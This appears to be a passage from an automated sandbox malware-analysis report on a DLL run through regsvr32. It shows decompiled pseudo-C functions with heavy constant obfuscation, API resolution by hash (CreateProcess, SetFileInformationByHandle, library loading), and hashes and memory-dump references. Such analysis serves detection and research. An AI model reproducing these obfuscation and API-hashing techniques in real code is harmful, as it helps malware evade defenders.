0x100069ae
0x100069b4
0x00000000
0x100069b4
0x1000696b
0x10006971
0x00000000
0x10006977
0x1000697b
0x10006983
0x10006988
0x10006989
0x00000000
0x10006989
0x10006971
0x10006969
0x10006961
0x10006955
0x00000000
0x10006949
0x10006a4e
0x10006a57
0x10006a5e
0x10006a62
0x10006a69
0x10006a6b
0x10006a6d
0x10006a73
0x10006a75
0x10006a75
0x10006a6f
0x10006a6f
0x10006a71
0x00000000
0x00000000
0x10006a71
0x10006a6d
0x10006a76
0x10006a78
0x10006a78
0x10006a78
0x10006a83
0x10006a8c

Strings

Qhx, xrefs: 10006896
$, xrefs: 10006801

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$Qhx
API String ID: 0-197651788
Opcode ID: 791857236164d02831ad08d0b56a7f91f0cea470df921da14b7b42948f95023a
Instruction ID: 10ba1dcdeb49bab95b586810526b4cf1fef146acc87717e7e3814765c8cac8f3
Opcode Fuzzy Hash: 791857236164d02831ad08d0b56a7f91f0cea470df921da14b7b42948f95023a
Instruction Fuzzy Hash: 89A141B29083819FD794DF65C84940FFBE2FBC5748F508A2DF5A69A260D7B189098F43

Uniqueness

Uniqueness Score: -1.00%

Function 100163F0 Relevance: 2.7, Strings: 2, Instructions: 180
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E100163F0(void* __ecx, void* __edx, void* __eflags) {
				void* _t182;
				void* _t198;
				void* _t199;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				intOrPtr _t224;
				void* _t228;
				intOrPtr* _t231;
				void* _t232;

				_t231 = _t232 - 0x58;
				_push( *((intOrPtr*)(_t231 + 0x7c)));
				_t228 = __edx;
				_push( *((intOrPtr*)(_t231 + 0x78)));
				_push( *((intOrPtr*)(_t231 + 0x74)));
				_push( *((intOrPtr*)(_t231 + 0x70)));
				_push( *((intOrPtr*)(_t231 + 0x6c)));
				_push( *((intOrPtr*)(_t231 + 0x68)));
				_push( *((intOrPtr*)(_t231 + 0x64)));
				_push( *((intOrPtr*)(_t231 + 0x60)));
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t182);
				 *((intOrPtr*)(_t231 - 0x10)) = 0xa12ebd;
				asm("stosd");
				_t204 = 0x23;
				asm("stosd");
				asm("stosd");
				 *(_t231 + 0x14) = 0x4ce06;
				 *(_t231 + 0x14) =  *(_t231 + 0x14) | 0xce0eb339;
				 *(_t231 + 0x14) =  *(_t231 + 0x14) ^ 0xce07f245;
				 *(_t231 + 0x50) = 0x3adc4;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) | 0x4fdbd433;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) >> 0xe;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) << 4;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) ^ 0x001b1eef;
				 *(_t231 + 0x10) = 0x768a7c;
				 *(_t231 + 0x10) =  *(_t231 + 0x10) << 5;
				 *(_t231 + 0x10) =  *(_t231 + 0x10) ^ 0x0ed2c877;
				 *(_t231 + 0x20) = 0xada7ce;
				 *(_t231 + 0x20) =  *(_t231 + 0x20) + 0xc200;
				 *(_t231 + 0x20) =  *(_t231 + 0x20) ^ 0x00a5dca1;
				 *(_t231 + 0x4c) = 0xc88035;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) << 0xd;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) + 0x6488;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) + 0xffff9e93;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) ^ 0x100681d7;
				 *(_t231 + 0x54) = 0xd6144f;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) + 0xffff72a1;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) | 0x30d83d50;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) << 0xa;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) ^ 0x76fc99ec;
				 *(_t231 + 0x38) = 0xb14237;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) * 0x23;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) >> 1;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) * 0x44;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) ^ 0x37f40a98;
				 *(_t231 + 0x48) = 0x7a8a6e;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) ^ 0x15bd044f;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) << 6;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) / _t204;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) ^ 0x034030ab;
				 *(_t231 + 0x2c) = 0xb394d7;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) << 0x10;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) + 0x928b;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) ^ 0x94dff95f;
				 *(_t231 + 0x24) = 0x4f5f0e;
				 *(_t231 + 0x24) =  *(_t231 + 0x24) ^ 0x5ef8c8a7;
				 *(_t231 + 0x24) =  *(_t231 + 0x24) ^ 0x5eba2965;
				 *(_t231 + 0x18) = 0x650104;
				 *(_t231 + 0x18) =  *(_t231 + 0x18) * 0x7a;
				 *(_t231 + 0x18) =  *(_t231 + 0x18) ^ 0x302f230d;
				 *(_t231 + 0x40) = 0x834642;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) + 0xffff2e5d;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) * 0x5f;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) + 0xffff3d2e;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) ^ 0x3060b637;
				 *(_t231 + 0x3c) = 0x535eca;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) ^ 0x66e1a418;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) >> 5;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) ^ 0x91933fc9;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) ^ 0x92a95cdb;
				 *(_t231 + 0x44) = 0x45d577;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) << 0xf;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) | 0xdf76547f;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) ^ 0xfff84ff6;
				 *(_t231 + 0x1c) = 0x9efa98;
				 *(_t231 + 0x1c) =  *(_t231 + 0x1c) | 0xcf343fbb;
				 *(_t231 + 0x1c) =  *(_t231 + 0x1c) ^ 0xcfbd4199;
				 *(_t231 + 0x34) = 0x8cbc2d;
				_t205 = 0x25;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) / _t205;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) ^ 0x3e2f16f8;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) + 0x97c3;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) ^ 0x3e263058;
				 *(_t231 + 0x28) = 0xaf5645;
				 *(_t231 + 0x28) =  *(_t231 + 0x28) ^ 0xfa2eecf7;
				_t206 = 0x38;
				 *(_t231 + 0x28) =  *(_t231 + 0x28) * 0x1f;
				 *(_t231 + 0x28) =  *(_t231 + 0x28) ^ 0x55bff0ae;
				 *(_t231 + 0x30) = 0xde2b91;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) + 0x9519;
				_t207 = _t231 - 0x54;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) / _t206;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) ^ 0x000f09bc;
				_push( *(_t231 + 0x10));
				_push( *(_t231 + 0x50));
				_t224 = 0x44;
				_push(_t224);
				E1000B184(_t231 - 0x54,  *(_t231 + 0x14));
				 *((intOrPtr*)(_t231 - 0x54)) = _t224;
				_t198 = E100146E0( *(_t231 + 0x20), _t231, _t231 - 0x54,  *((intOrPtr*)(_t231 + 0x60)),  *(_t231 + 0x4c), _t231 - 0x54, _t207,  *(_t231 + 0x54),  *(_t231 + 0x38),  *(_t231 + 0x48), _t207,  *((intOrPtr*)(_t231 + 0x6c)),  *(_t231 + 0x2c),  *((intOrPtr*)(_t231 + 0x64)), _t207,  *(_t231 + 0x24),  *(_t231 + 0x18), _t228,  *(_t231 + 0x40)); // executed
				if(_t198 == 0) {
					_t199 = 0;
				} else {
					if( *((intOrPtr*)(_t231 + 0x70)) == 0) {
						E1001E373( *(_t231 + 0x3c),  *_t231,  *(_t231 + 0x44),  *(_t231 + 0x1c));
						E1001E373( *(_t231 + 0x34),  *((intOrPtr*)(_t231 + 4)),  *(_t231 + 0x28),  *(_t231 + 0x30));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t199 = 1;
				}
				return _t199;
			}

0x100163f1
0x100163fd
0x10016400
0x10016402
0x10016405
0x10016408
0x1001640b
0x1001640e
0x10016411
0x10016414
0x10016417
0x10016418
0x10016419
0x1001641e
0x1001642c
0x1001642f
0x10016430
0x10016431
0x10016432
0x10016439
0x10016440
0x10016447
0x1001644e
0x10016455
0x10016459
0x1001645d
0x10016464
0x1001646b
0x1001646f
0x10016476
0x1001647d
0x10016484
0x1001648b
0x10016492
0x10016496
0x1001649d
0x100164a4
0x100164ab
0x100164b2
0x100164b9
0x100164c0
0x100164c4
0x100164cb
0x100164d6
0x100164d9
0x100164e0
0x100164e3
0x100164ea
0x100164f1
0x100164f8
0x10016501
0x10016504
0x1001650b
0x10016512
0x10016516
0x1001651d
0x10016524
0x1001652b
0x10016532
0x10016539
0x10016544
0x10016547
0x1001654e
0x10016555
0x10016560
0x10016563
0x1001656a
0x10016571
0x10016578
0x1001657f
0x10016583
0x1001658c
0x10016593
0x1001659a
0x1001659e
0x100165a5
0x100165ac
0x100165b3
0x100165ba
0x100165c1
0x100165cd
0x100165d2
0x100165d7
0x100165de
0x100165e5
0x100165ec
0x100165f3
0x100165fe
0x100165ff
0x10016602
0x10016609
0x10016610
0x1001661c
0x1001661f
0x10016622
0x10016629
0x1001662c
0x10016634
0x10016635
0x10016636
0x1001663e
0x10016671
0x1001667b
0x100166b9
0x1001667d
0x10016681
0x1001669e
0x100166af
0x10016683
0x10016689
0x1001668a
0x1001668b
0x1001668c
0x1001668c
0x1001668f
0x1001668f
0x100166c1

Strings

X0&>, xrefs: 100165E5
#/0, xrefs: 10016547

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: #/0$X0&>
API String ID: 963392458-1092357378
Opcode ID: c0ddee5fd4d9338019eff7733ba4545dadf4ba83aad9730f6a312ff067a312df
Instruction ID: 812005c2b18548d0e28abbe36bec9a77000419ef8f9f908eef8e6e18b9a0d8d7
Opcode Fuzzy Hash: c0ddee5fd4d9338019eff7733ba4545dadf4ba83aad9730f6a312ff067a312df
Instruction Fuzzy Hash: EB91E172400248ABDF59CFA1C98A8CE3BA1FF44348F505119FE169A160D3B6D999CF85

Uniqueness

Uniqueness Score: -1.00%

Function 1000F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1000F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E10009E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E1001BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x1000f1e5
0x1000f1ea
0x1000f1f5
0x1000f1fa
0x1000f203
0x1000f20a
0x1000f20d
0x1000f210
0x1000f217
0x1000f21b
0x1000f21f
0x1000f226
0x1000f22d
0x1000f23a
0x1000f23e
0x1000f241
0x1000f245
0x1000f24c
0x1000f253
0x1000f25a
0x1000f25e
0x1000f265
0x1000f276
0x1000f279
0x1000f27d
0x1000f284
0x1000f2a3
0x1000f2b0
0x1000f2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 1000F2B0

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 43db0fbf410f694bd0ef4dec65830130c7b281efdb88c6d3b62f5dfa9fb1508e
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: B12155B5D0121DAFDB08DFA5C88A8EEFBB4FB48708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001EAA3 Relevance: 1.3, Strings: 1, Instructions: 61
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001EAA3(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t76;
				signed int _t78;
				signed int _t79;
				long _t86;

				_t86 = __ecx;
				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v40 = 0xadf844;
				_v16 = 0xf6e9bb;
				_v16 = _v16 >> 8;
				_v16 = _v16 + 0x7dbf;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x005d2a08;
				_v20 = 0x12673e;
				_v20 = _v20 ^ 0xf407eadf;
				_v20 = _v20 ^ 0xa755c6a0;
				_v20 = _v20 ^ 0x53402941;
				_v8 = 0x8c33f5;
				_v8 = _v8 + 0xffff44cb;
				_v8 = _v8 + 0xffff9a1f;
				_v8 = _v8 + 0xffff9902;
				_v8 = _v8 ^ 0x008a2e37;
				_v28 = 0x7148db;
				_v28 = _v28 + 0x7d9e;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0x71cbeafd;
				_v24 = 0x27f240;
				_t78 = 0x52;
				_v24 = _v24 / _t78;
				_t79 = 0x43;
				_v24 = _v24 / _t79;
				_v24 = _v24 ^ 0x000f93f9;
				_v12 = 0x23e9a0;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0x5fb4;
				_v12 = _v12 + 0x3b84;
				_v12 = _v12 ^ 0x0946ed0e;
				_t76 = E10011B22(_v16, E1000645E(_t79), _v28, _t86, _v24, _v12); // executed
				return _t76;
			}

0x1001eaaa
0x1001eaac
0x1001eab2
0x1001eab6
0x1001eabd
0x1001eac4
0x1001eac8
0x1001eacf
0x1001ead3
0x1001eada
0x1001eae1
0x1001eae8
0x1001eaef
0x1001eaf6
0x1001eafd
0x1001eb04
0x1001eb0b
0x1001eb12
0x1001eb19
0x1001eb20
0x1001eb27
0x1001eb2b
0x1001eb32
0x1001eb3e
0x1001eb43
0x1001eb4b
0x1001eb4e
0x1001eb51
0x1001eb58
0x1001eb63
0x1001eb66
0x1001eb6d
0x1001eb74
0x1001eb95
0x1001eba1

Strings

A)@S, xrefs: 1001EAEF

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: A)@S
API String ID: 1279760036-929813088
Opcode ID: 96fbd274c400adf03dae65a9eb1dd860f24e530fd5e2e85c97f7041d23a2abd0
Instruction ID: ebfe1cbce303b3971f74280ffc54df5c80a489071e6d62e07b190a9fd1923f22
Opcode Fuzzy Hash: 96fbd274c400adf03dae65a9eb1dd860f24e530fd5e2e85c97f7041d23a2abd0
Instruction Fuzzy Hash: 3E3102B1D0120AEBDF54CFA5D94A5EEBBB1FF00318F208099C514B6294D3B81B948F91

Uniqueness

Uniqueness Score: -1.00%

Function 100109F9 Relevance: .1, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E100109F9(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t86;
				signed int* _t88;
				signed int _t98;
				signed int _t99;

				_v44 = _v44 & 0x00000000;
				_v52 = 0xdaf1ae;
				_v48 = 0xe55ff4;
				_v32 = 0xd4fa88;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0xa9f60fa6;
				_v20 = 0x8ed20a;
				_t98 = __edx;
				_v20 = _v20 * 0x5f;
				_v20 = _v20 + 0xb66b;
				_v20 = _v20 ^ 0x3507d775;
				_v8 = 0xb9afb1;
				_v8 = _v8 + 0xffff49c8;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffffeb1f;
				_v8 = _v8 ^ 0xf97bc907;
				_v16 = 0x3c6eb8;
				_v16 = _v16 + 0x7c79;
				_v16 = _v16 | 0xf006611a;
				_v16 = _v16 ^ 0xf034c6c9;
				_v24 = 0xe8b352;
				_v24 = _v24 + 0xd8f8;
				_v24 = _v24 + 0xffff86d3;
				_v24 = _v24 ^ 0x00e4af8f;
				_v36 = 0x8da3be;
				_v36 = _v36 + 0x6173;
				_v36 = _v36 ^ 0x008c5195;
				_v12 = 0x6f07f7;
				_t99 = 0x30;
				_v12 = _v12 / _t99;
				_v12 = _v12 + 0xffff4c40;
				_v12 = _v12 + 0xdb55;
				_v12 = _v12 ^ 0x0004a3ef;
				_v40 = 0x88e28b;
				_v40 = _v40 + 0x4afa;
				_v40 = _v40 ^ 0x0088a691;
				_v28 = 0x15831c;
				_v28 = _v28 + 0x4c5;
				_v28 = _v28 ^ 0x965131ca;
				_v28 = _v28 ^ 0x9640275c;
				_push(_v16);
				_push(_v8);
				_push(_v20);
				_t86 = E1000FCB5(_v24, E10004BB4(_t88, _v32), _v36); // executed
				 *((intOrPtr*)( *0x10025078 + 0x28 + _t98 * 4)) = _t86;
				return E1000B9D7(_v12, _v40, _t85, _v28);
			}

0x100109ff
0x10010a03
0x10010a0a
0x10010a11
0x10010a18
0x10010a1c
0x10010a23
0x10010a32
0x10010a36
0x10010a39
0x10010a40
0x10010a47
0x10010a4e
0x10010a55
0x10010a59
0x10010a60
0x10010a67
0x10010a6e
0x10010a75
0x10010a7c
0x10010a83
0x10010a8a
0x10010a91
0x10010a98
0x10010a9f
0x10010aa6
0x10010aad
0x10010ab4
0x10010abe
0x10010ac1
0x10010ac4
0x10010acb
0x10010ad2
0x10010ad9
0x10010ae0
0x10010ae7
0x10010aee
0x10010af5
0x10010afc
0x10010b03
0x10010b0a
0x10010b0d
0x10010b10
0x10010b25
0x10010b37
0x10010b4b

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a346c998e8c4990dc9e4a15bb1ec25002e978646055b4953ec535984ffb937c0
Instruction ID: b89bf20f564e67fe4e641c78cf405d36308e7a92b198982063818996cb7fb0c8
Opcode Fuzzy Hash: a346c998e8c4990dc9e4a15bb1ec25002e978646055b4953ec535984ffb937c0
Instruction Fuzzy Hash: D93115B6C01319DBDF44DFE5C94A4DEBBB1FB44328F208199D511B6260D3B91A09CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A1FC Relevance: 15.1, APIs: 10, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E6DA4A1FC(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x6da85b4c
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0x470cb0
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E6DA449D1(_t57, _t59, _t68, _t72, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E6DA449D1(_t57, _t59, _t68, _t72, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0x470cb0
							_t72 =  *_t16;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E6DA44860(_t61);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x0
						_v12 = _t40;
						E6DA5C5A0(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0x470cb0
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0x470cb0
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x0
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x1
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0x470cb0
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}

0x6da4a1fc
0x6da4a201
0x6da4a202
0x6da4a205
0x6da4a207
0x6da4a207
0x6da4a20c
0x6da4a20f
0x6da4a215
0x6da4a215
0x6da4a218
0x6da4a218
0x6da4a21d
0x6da4a22c
0x6da4a22e
0x6da4a231
0x6da4a24e
0x6da4a24e
0x6da4a24e
0x6da4a251
0x6da4a254
0x6da4a256
0x6da4a26e
0x6da4a275
0x6da4a278
0x6da4a286
0x6da4a28c
0x6da4a291
0x6da4a258
0x6da4a25b
0x6da4a261
0x6da4a265
0x6da4a265
0x6da4a299
0x6da4a29b
0x6da4a29b
0x6da4a2a0
0x6da4a2aa
0x6da4a2aa
0x6da4a2b3
0x6da4a2b9
0x6da4a2b9
0x6da4a2bf
0x6da4a2c5
0x6da4a2d0
0x6da4a2d9
0x6da4a2e4
0x6da4a2e7
0x6da4a233
0x6da4a233
0x6da4a236
0x6da4a239
0x6da4a23e
0x6da4a23f
0x6da4a244
0x00000000
0x00000000
0x00000000
0x6da4a244
0x6da4a248
0x00000000
0x00000000
0x6da4a248
0x6da4a21f
0x6da4a21f
0x6da4a226
0x00000000
0x00000000
0x6da4a226
0x6da4a2ea
0x6da4a2ed
0x6da4a2ef
0x6da4a2f2
0x6da4a2f2
0x6da4a2f5
0x6da4a2fe
0x6da4a301
0x6da4a304
0x6da4a307
0x6da4a313

APIs

EnterCriticalSection.KERNEL32(6DA85B4C,?,?,?,6DA85B30,6DA85B30,?,6DA4A544,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA4A20F
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,6DA85B30,6DA85B30,?,6DA4A544,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000), ref: 6DA4A265
GlobalHandle.KERNEL32(00470CB0), ref: 6DA4A26E
GlobalUnlock.KERNEL32(00000000,?,?,?,6DA85B30,6DA85B30,?,6DA4A544,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA4A278
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 6DA4A291
GlobalHandle.KERNEL32(00470CB0), ref: 6DA4A2A3
GlobalLock.KERNEL32 ref: 6DA4A2AA
LeaveCriticalSection.KERNEL32(?,?,?,?,6DA85B30,6DA85B30,?,6DA4A544,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA4A2B3
GlobalLock.KERNEL32 ref: 6DA4A2BF
LeaveCriticalSection.KERNEL32(?,00000030,00000000,?), ref: 6DA4A307

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 9c9d87cafc396556a4dc6244d7fa2ad6b072ecc168221ad1f4016a8b94e3ab35
Instruction ID: 9f36695d38c952ec4c536fc11586cfd383e99587041274ef8d6290ea5a930970
Opcode Fuzzy Hash: 9c9d87cafc396556a4dc6244d7fa2ad6b072ecc168221ad1f4016a8b94e3ab35
Instruction Fuzzy Hash: B731D07664C705AFDB20CFA5C888F1A7BF9EF46306F01C929E652C3610DB72E8818B55

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5AA38 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E6DA5AA38(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x6da7e990);
				_t8 = E6DA5C918(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
